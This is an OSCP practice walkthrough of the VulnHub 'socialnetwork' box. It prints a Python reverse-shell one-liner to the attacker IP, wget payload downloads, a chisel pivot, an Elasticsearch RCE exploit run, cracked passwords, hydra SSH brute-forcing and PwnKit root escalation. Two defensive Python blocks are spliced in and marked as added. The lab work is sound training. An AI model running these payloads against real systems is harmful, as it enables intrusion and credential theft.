OSCP Practice Box | socialnetwork

admin · 2024-07-13 14:36:35 · 40 views

Starting today the hands-on box series begins in earnest: one box per day, and everyone is welcome to hold me to it.


0 - Preface

The approach to these boxes mainly follows "OSCP | Textbook Summary".

Readers who are not familiar with the course material can refer to "OSCP | Textbook Notes Collection Download".

Wherever a step in the walkthrough relies on course material I note the chapter number, so you can go back to the textbook notes whenever something is unfamiliar.

1 - Environment Setup

Box download address:

https://www.vulnhub.com/entry/boredhackerblog-social-network,454/

Kali image:

kali-linux-2024.2-virtualbox-amd64

Virtual machine environment:

Oracle VM VirtualBox 7.0

Network:

Both Kali and the target are attached to a "Host-Only" network. Start Kali first, then the target. Kali's IP is 192.168.56.101; the target's IP is 192.168.56.102.

2 - Attacking the Box

2-1 - Scanning and Enumeration

Port scan; command reference: "OSCP | Information Gathering", section "6.3 Active Information Gathering".

sudo nmap -p 1-65535 192.168.56.102
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-11 02:06 EDT
Nmap scan report for 192.168.56.102
Host is up (0.00028s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp
MAC Address: 08:00:27:40:AC:CA (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 14.48 seconds

Ports 22 and 5000 are open. Service enumeration; command reference: "OSCP | Information Gathering", section "6.3 Active Information Gathering".

sudo nmap -p22,5000 -sT -A 192.168.56.102
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-11 02:08 EDT
Nmap scan report for 192.168.56.102
Host is up (0.00034s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 cc:53:20:b8:10:db:52:5f:16:02:bc:ee:57:22:80:e1 (DSA)
|   2048 01:50:f6:1f:32:e8:0d:fc:48:38:3e:c8:1b:ac:20:02 (RSA)
|   256 3b:ae:9a:bd:cb:ff:8f:54:64:32:ec:bf:38:fd:fe:6b (ECDSA)
|_  256 77:4e:8b:20:73:52:a4:ee:93:1d:b3:85:f2:25:d7:55 (ED25519)
5000/tcp open  http    Werkzeug httpd 0.14.1 (Python 2.7.15)
|_http-title: Leave a message
|_http-server-header: Werkzeug/0.14.1 Python/2.7.15
MAC Address: 08:00:27:40:AC:CA (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.34 ms 192.168.56.102

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.19 seconds

Port 22 is SSH, version OpenSSH 6.6p1; a search for exploitable vulnerabilities turned up nothing.

Port 5000 is an HTTP service running Werkzeug, a Python-based microblog application, so we can enumerate web paths; command reference: "OSCP | Introduction to Web Attacks", section "8.2.3 Directory Enumeration".

gobuster dir -u http://192.168.56.102:5000 -w /usr/share/wordlists/dirb/common.txt -t 5
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.102:5000
[+] Method:                  GET
[+] Threads:                 5
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 200) [Size: 401]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

The /admin directory is found.

2-2 - Exploitation

Visiting http://192.168.56.102:5000/admin shows a page that executes Python code, so we try a Python reverse shell.

Generate the payload with https://revshells.com

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.101",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")

Submit the payload through the page while Kali listens on port 443; a shell comes back.

Looking at the local files, there is a Dockerfile, which suggests a Docker environment.

nc -lvnp 443
ls
Dockerfile        main.py           requirements.txt  templates

Confirm whether this really is a Docker environment.

cat Dockerfile
ls /.dockerenv
cat /proc/1/cgroup

Docker-related configuration is present, so this is indeed a Docker container; we need to escape it to reach the host.

Check the IP address.

ip add
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
4: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP
    link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
       valid_lft forever preferred_lft forever

The container has a 172.17.0.0/16 address, so we do internal host discovery. There are no scanning tools on the machine, so ping is used to find live hosts.

for i in $(seq 1 10); do ping -c 1 172.17.0.$i; done
--- 172.17.0.1 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.077/0.077/0.077 ms
PING 172.17.0.2 (172.17.0.2): 56 data bytes
64 bytes from 172.17.0.2: seq=0 ttl=64 time=0.138 ms
--- 172.17.0.2 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.138/0.138/0.138 ms
PING 172.17.0.3 (172.17.0.3): 56 data bytes
64 bytes from 172.17.0.3: seq=0 ttl=64 time=0.026 ms
--- 172.17.0.3 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.026/0.026/0.026 ms
PING 172.17.0.4 (172.17.0.4): 56 data bytes
--- 172.17.0.4 ping statistics ---
1 packets transmitted, 0 packets received, 100% packet loss
PING 172.17.0.5 (172.17.0.5): 56 data bytes

Three hosts answer ping. Upload the proxy tool chisel; command reference: "OSCP | Tunneling Through DPI", section "19.1.2 Building an HTTP Tunnel with chisel".

On Kali, start an HTTP server and the chisel listener.

python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

chisel server --port 8080 --reverse
2024/07/11 02:55:57 server: Reverse tunnelling enabled
2024/07/11 02:55:57 server: Fingerprint D5w60b7wpqc/nLfUBoUOSySgP/fpFZ9jEloSpS/3ts4=
2024/07/11 02:55:57 server: Listening on http://0.0.0.0:8080

Download and run it on the target.

wget http://192.168.56.101/chisel -O /tmp/chisel && chmod +x /tmp/chisel
Connecting to 192.168.56.101 (192.168.56.101:80)
chisel               100% |*******************************|  8452k  0:00:00 ETA

/tmp/chisel client 192.168.56.101:8080 R:socks
2024/07/11 06:59:47 client: Connecting to ws://192.168.56.101:8080
2024/07/11 06:59:47 client: Connected (Latency 387.922µs)

On Kali, edit the proxychains configuration file.

sudo vi /etc/proxychains4.conf
socks5 127.0.0.1 1080

Scan the 172.17.0.0/16 hosts through the proxy; command reference: "OSCP | Information Gathering", section "6.3 Active Information Gathering".

proxychains4 nc -nv -w 1 -z 172.17.0.1 1-65535
proxychains4 nc -nv -w 1 -z 172.17.0.2 1-65535
proxychains4 nc -nv -w 1 -z 172.17.0.3 1-65535
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.17.0.1:23 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.17.0.1:22  ...  OK
(UNKNOWN) [172.17.0.1] 22 (ssh) open : Operation now in progress
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.17.0.1:21 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.17.0.1:20 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.17.0.1:5001 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.17.0.1:5000  ...  OK
(UNKNOWN) [172.17.0.1] 5000 (?) open : Operation now in progress
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.17.0.1:4999 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.17.0.2:9200  ...  OK
(UNKNOWN) [172.17.0.2] 9200 (?) open : Operation now in progress
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.17.0.2:9199 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.17.0.3:5002 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.17.0.3:5001 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.17.0.3:5000  ...  OK
(UNKNOWN) [172.17.0.3] 5000 (?) open : Operation now in progress
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.17.0.3:4999 <--socket error or timeout!

172.17.0.1 has ports 22 and 5000 open, 172.17.0.2 has port 9200 open, and 172.17.0.3 has port 5000 open.

172.17.0.1 and 172.17.0.3 expose essentially the same services as 192.168.56.102, so the focus is port 9200 on 172.17.0.2.

proxychains4 curl http://172.17.0.2:9200
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.17.0.2:9200  ...  OK
{
  "status" : 200,
  "name" : "Agent Axis",
  "cluster_name" : "elasticsearch",
  "version" : {
    "number" : "1.4.2",
    "build_hash" : "927caff6f05403e936c20bf4529f144f0c89fd8c",
    "build_timestamp" : "2014-12-16T14:11:12Z",
    "build_snapshot" : false,
    "lucene_version" : "4.10.2"
  },
  "tagline" : "You Know, for Search"
}

It is Elasticsearch 1.4.2. Look up vulnerability information; command reference: "OSCP | Exploiting Known Vulnerabilities", section "12.3.2 SearchSploit".

searchsploit elasticsearch
---------------------------------------------------------------------- ---------------------------
 Exploit Title                                                        |  Path
---------------------------------------------------------------------- ---------------------------
ElasticSearch - Remote Code Execution                                 | linux/remote/36337.py
ElasticSearch - Remote Code Execution                                 | multiple/webapps/33370.html
ElasticSearch - Search Groovy Sandbox Bypass (Metasploit)             | java/remote/36415.rb
Elasticsearch - StackOverflow DoS                                     | multiple/dos/51787.txt
ElasticSearch 1.6.0 - Arbitrary File Download                         | linux/webapps/38383.py
ElasticSearch 7.13.3 - Memory disclosure                              | multiple/webapps/50149.py
ElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal                 | php/webapps/37054.py
ElasticSearch Dynamic Script - Arbitrary Java Execution (Metasploit)  | java/remote/33588.rb
Elasticsearch ECE 7.13.3 - Anonymous Database Dump                    | multiple/webapps/50152.py
---------------------------------------------------------------------- ---------------------------
Shellcodes: No Results

searchsploit -m linux/remote/36337.py
  Exploit: ElasticSearch - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/36337
     Path: /usr/share/exploitdb/exploits/linux/remote/36337.py
    Codes: CVE-2015-1427, OSVDB-118239
 Verified: True
File Type: Python script, Unicode text, UTF-8 text executable
Copied to: /home/kali/36337.py

The exploit code is written in Python 2; run it against 172.17.0.2.

proxychains4 python2 36337.py 172.17.0.2
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[ASCII-art banner of the exploit omitted]
Exploit for ElasticSearch , CVE-2015-1427   Version: 20150309.1
{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something
~$ id
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.17.0.2:9200  ...  OK
uid=0(root) gid=0(root) groups=0(root)
~$ 

We get a shell and can run commands; looking at the files, this is again a Docker container.

ls -al
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.17.0.2:9200  ...  OK
total 27172
drwxr-xr-x 37 root root     4096 Jul 11 08:18 .
drwxr-xr-x 37 root root     4096 Jul 11 08:18 ..
-rwxr-xr-x  1 root root        0 Jul 11 08:18 .dockerenv
drwxr-xr-x  2 root root     4096 Oct 11  2018 bin
drwxr-xr-x  2 root root     4096 Jun 14  2018 boot
drwxr-xr-x  5 root root      360 Jul 11 08:18 dev
drwxr-xr-x  7 root root     4096 Jul 11 08:18 elasticsearch
-rw-r--r--  1 root root 27734207 May 16  2018 elasticsearch-1.4.2.tar.gz
drwxr-xr-x 69 root root     4096 Jul 11 08:18 etc
drwxr-xr-x  2 root root     4096 Jun 14  2018 home
drwxr-xr-x 12 root root     4096 Oct 29  2018 lib
drwxr-xr-x  2 root root     4096 Oct 11  2018 lib64
-rwxrwxr-x  1 root root      262 Oct 29  2018 main.sh
drwxr-xr-x  2 root root     4096 Oct 11  2018 media
drwxr-xr-x  2 root root     4096 Oct 11  2018 mnt
drwxr-xr-x  2 root root     4096 Oct 11  2018 opt
-rw-rw-r--  1 root root      287 Oct 29  2018 passwords
dr-xr-xr-x 88 root root        0 Jul 11 08:18 proc
drwx------  2 root root     4096 Oct 11  2018 root
drwxr-xr-x  4 root root     4096 Oct 29  2018 run
drwxr-xr-x  2 root root     4096 Oct 29  2018 sbin
drwxr-xr-x  2 root root     4096 Oct 11  2018 srv
dr-xr-xr-x 13 root root        0 Jul 11 08:18 sys
drwxrwxrwt  4 root root     4096 Jul 11 08:18 tmp
drwxr-xr-x 16 root root     4096 Oct 29  2018 usr
drwxr-xr-x 14 root root     4096 Oct 29  2018 var
~$ cat /proc/1/cgroup
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.17.0.2:9200  ...  OK
11:hugetlb:/docker/789a71def4a017081de8e955302fe533ad690b326c6b495e21ea98c3f83ca867
10:perf_event:/docker/789a71def4a017081de8e955302fe533ad690b326c6b495e21ea98c3f83ca867
9:blkio:/docker/789a71def4a017081de8e955302fe533ad690b326c6b495e21ea98c3f83ca867
8:freezer:/docker/789a71def4a017081de8e955302fe533ad690b326c6b495e21ea98c3f83ca867
7:devices:/docker/789a71def4a017081de8e955302fe533ad690b326c6b495e21ea98c3f83ca867
6:memory:/docker/789a71def4a017081de8e955302fe533ad690b326c6b495e21ea98c3f83ca867
5:cpuacct:/docker/789a71def4a017081de8e955302fe533ad690b326c6b495e21ea98c3f83ca867
4:cpu:/docker/789a71def4a017081de8e955302fe533ad690b326c6b495e21ea98c3f83ca867
3:cpuset:/docker/789a71def4a017081de8e955302fe533ad690b326c6b495e21ea98c3f83ca867
2:name=systemd:/docker/789a71def4a017081de8e955302fe533ad690b326c6b495e21ea98c3f83ca867
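The two container indicators checked by hand in both containers (ls /.dockerenv and cat /proc/1/cgroup) as one script a responder or audit job can run. This is an added example, not code from the original post: SAMPLE_DOCKER is constructed to mirror the cgroup output above, and the function names are this example's own.

```python
"""Container-awareness check built from the two indicators used above.

Added example, not from the original post: SAMPLE_DOCKER is constructed
to mirror the box's /proc/1/cgroup; function names are this example's own.
"""
import os
import re

# cgroup v1 places a container's processes under /docker/<64-hex-id>.
# cgroup v2 usually shows only "0::/" inside a container, so the path
# test alone can miss; /.dockerenv is the second, weaker, indicator.
DOCKER_PATH = re.compile(r"/docker/([0-9a-f]{64})(?:/|$)")


def container_id_from_cgroup(cgroup_text):
    """Return the Docker id named in /proc/1/cgroup text, or None.

    Lines look like 'hierarchy:controllers:path'. If different lines name
    different ids the data is inconsistent and None is returned.
    """
    ids = set()
    for line in cgroup_text.splitlines():
        parts = line.split(":", 2)
        if len(parts) != 3:
            continue  # blank or malformed line
        match = DOCKER_PATH.search(parts[2])
        if match:
            ids.add(match.group(1))
    return ids.pop() if len(ids) == 1 else None


def classify(cgroup_text, dockerenv_present):
    """'container' (cgroup names an id), 'likely' (/.dockerenv only), 'host'."""
    if container_id_from_cgroup(cgroup_text):
        return "container"
    if dockerenv_present:
        return "likely"
    return "host"


def check_local():
    """Run the same check on the machine this script executes on."""
    try:
        with open("/proc/1/cgroup") as fh:
            cgroup_text = fh.read()
    except OSError:
        cgroup_text = ""
    return classify(cgroup_text, os.path.exists("/.dockerenv"))


CONTAINER_ID = "789a71def4a017081de8e955302fe533ad690b326c6b495e21ea98c3f83ca867"
CONTROLLERS = ["name=systemd", "cpuset", "cpu", "cpuacct", "memory",
               "devices", "freezer", "blkio", "perf_event", "hugetlb"]
# Constructed sample mirroring the box's cgroup v1 output.
SAMPLE_DOCKER = "\n".join("%d:%s:/docker/%s" % (n, ctl, CONTAINER_ID)
                          for n, ctl in enumerate(CONTROLLERS, start=2))
# Constructed sample for a plain host: controllers sit at the root path.
SAMPLE_HOST = "11:hugetlb:/\n10:perf_event:/\n2:name=systemd:/user.slice\n"

if __name__ == "__main__":
    print("sample:", classify(SAMPLE_DOCKER, True))  # container
    print("host:  ", classify(SAMPLE_HOST, False))   # host
    print("local: ", check_local())
```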

But the root directory contains a passwords file; cat it.

cat passwords
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.17.0.2:9200  ...  OK
Format: number,number,number,number,lowercase,lowercase,lowercase,lowercase
Example: 1234abcd
john:3f8184a7343664553fcb5337a3138814
test:861f194e9d6118f3d942a72be3e51749
admin:670c3bbc209a18dde5446e5e6c1f1d5b
root:b3d34352fc26117979deabdf1b9b6354
jane:5c158b60ed97c723b673529b8a3cf72b

These are password hashes, apparently MD5; crack them with the online service https://crackstation.net/

3f8184a7343664553fcb5337a3138814  md5  1337hack
861f194e9d6118f3d942a72be3e51749  md5  1234test
670c3bbc209a18dde5446e5e6c1f1d5b  md5  1111pass
b3d34352fc26117979deabdf1b9b6354  md5  1234pass
5c158b60ed97c723b673529b8a3cf72b  md5  1234jane
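The same file seen from the defender's side, as an added example that is not part of the original post: it reads the Format: line to size the password space, flags the bare 32-hex digests as unsalted MD5 (the reason a lookup service answers all of them instantly), and shows the salted, slow-KDF storage that would have resisted that lookup. SAMPLE_FILE is constructed from the entries above; the function names and the PBKDF2 iteration count are this example's assumptions.

```python
"""Audit of the box's 'passwords' file and a hardened replacement.

Added example, not part of the original post. SAMPLE_FILE is constructed
from the file shown above; the PBKDF2 settings are this example's choice.
"""
import hashlib
import hmac
import os
import re
from functools import reduce

# Alphabet size for each position class named on the file's Format: line.
CLASS_SIZE = {"number": 10, "lowercase": 26, "uppercase": 26}
MD5_HEX = re.compile(r"^[0-9a-f]{32}$")
ITERATIONS = 200_000  # PBKDF2 work factor (assumed value for this example)


def keyspace_size(format_spec):
    """Candidates implied by e.g. 'number,number,lowercase' (10*10*26)."""
    sizes = [CLASS_SIZE[c.strip()] for c in format_spec.split(",")]
    return reduce(lambda a, b: a * b, sizes, 1)


def audit_password_file(text):
    """Return (keyspace, [(user, digest, verdict), ...]).

    A bare 32-hex digest with no salt field is flagged 'unsalted-md5':
    one precomputed table covers every user, which is why the online
    service answered all five hashes at once.
    """
    keyspace, findings = None, []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("Format:"):
            keyspace = keyspace_size(line[len("Format:"):])
        elif ":" in line and not line.startswith("Example:"):
            user, digest = line.split(":", 1)
            verdict = "unsalted-md5" if MD5_HEX.match(digest) else "other"
            findings.append((user, digest, verdict))
    return keyspace, findings


def hash_password(password, salt=None):
    """Per-user random salt + slow KDF: 'pbkdf2_sha256$iters$salt$digest'."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (ITERATIONS, salt.hex(), digest.hex())


def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    _, iters, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(digest.hex(), digest_hex)


# Constructed sample mirroring the file found in the Elasticsearch container.
SAMPLE_FILE = """Format: number,number,number,number,lowercase,lowercase,lowercase,lowercase
Example: 1234abcd
john:3f8184a7343664553fcb5337a3138814
admin:670c3bbc209a18dde5446e5e6c1f1d5b
"""

if __name__ == "__main__":
    space, rows = audit_password_file(SAMPLE_FILE)
    print("keyspace:", space, "candidates", rows)  # 4569760000: trivial for MD5
    record = hash_password("1337hack")
    print(verify_password("1337hack", record), verify_password("1234pass", record))
```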

Build a username list name.txt

john
test
admin
root
jane

password.txt

1337hack
1234test
1111pass
1234pass
1234jane

Brute-force the SSH service on 192.168.56.102; command reference: "OSCP | Password Attacks", section "15.1.1 SSH and RDP".

hydra -L name.txt -P password.txt -s 22 ssh://192.168.56.102
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-07-11 04:53:32
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:5/p:5), ~2 tries per task
[DATA] attacking ssh://192.168.56.102:22/
[22][ssh] host: 192.168.56.102   login: john   password: 1337hack
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-07-11 04:53:36

SSH into 192.168.56.102

ssh john@192.168.56.102

Enter the password 1337hack when prompted.

We get a shell on the host; this time it is not a Docker container.

3 - Privilege Escalation

3-1 - Privilege Escalation Enumeration

Upload and run linpeas.sh; command reference: "OSCP | Linux Privilege Escalation", section "17.1.3 Automated Enumeration".

cd /tmp
wget http://192.168.56.101/linpeas.sh
chmod +x ./linpeas.sh
./linpeas.sh

══════════════════════════════╣ System Information ╠══════════════════════════════
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 3.13.0-24-generic (buildd@panlong) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014
Distributor ID: Ubuntu
Description:    Ubuntu 14.04 LTS
Release:        14.04
Codename:       trusty

The kernel version is old, so check the kernel vulnerability information.

╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2016-5195] dirtycow
   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
   Download URL: https://www.exploit-db.com/download/40611
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2016-5195] dirtycow 2
   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5|6|7,[ ubuntu=14.04|12.04 ],ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
   Download URL: https://www.exploit-db.com/download/40839
   ext-url: https://www.exploit-db.com/download/40847
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2015-1328] overlayfs
   Details: http://seclists.org/oss-sec/2015/q2/717
   Exposure: highly probable
   Tags: [ ubuntu=(12.04|14.04){kernel:3.13.0-(2|3|4|5)*-generic} ],ubuntu=(14.10|15.04){kernel:3.(13|16).0-*-generic}
   Download URL: https://www.exploit-db.com/download/37292

[+] [CVE-2021-4034] PwnKit
   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main

3-2 - Privilege Escalation Exploitation

These can be tried one by one; here I used [CVE-2021-4034] PwnKit (https://github.com/ly4k/PwnKit).

wget http://192.168.56.101/PwnKit
chmod +x ./PwnKit
./PwnKit
id
uid=0(root) gid=0(root) groups=0(root),1001(john)

Done.

There is more than one way in; try the others too.

If you know a good box, leave a message in the backend to recommend it.

Or, if you have your own box walkthrough notes, send them to me in the backend and I will share them.

Stay disciplined and be your best self.

Originally published on the WeChat official account 高级红队专家: OSCP实战靶机 | socialnetwork

Disclaimer: the programs (methods) covered in this article may be offensive in nature and are provided solely for security research and teaching. Readers who put this information to any other use bear full legal and joint liability; this site bears no legal or joint liability. For any issues, contact us by e-mail (a corporate or otherwise valid mailbox is recommended to avoid the message being blocked; contact details are on the home page).
Published by admin on 2024-07-13 14:36:35. Original link (CN-SEC): https://cn-sec.com/archives/2950429.html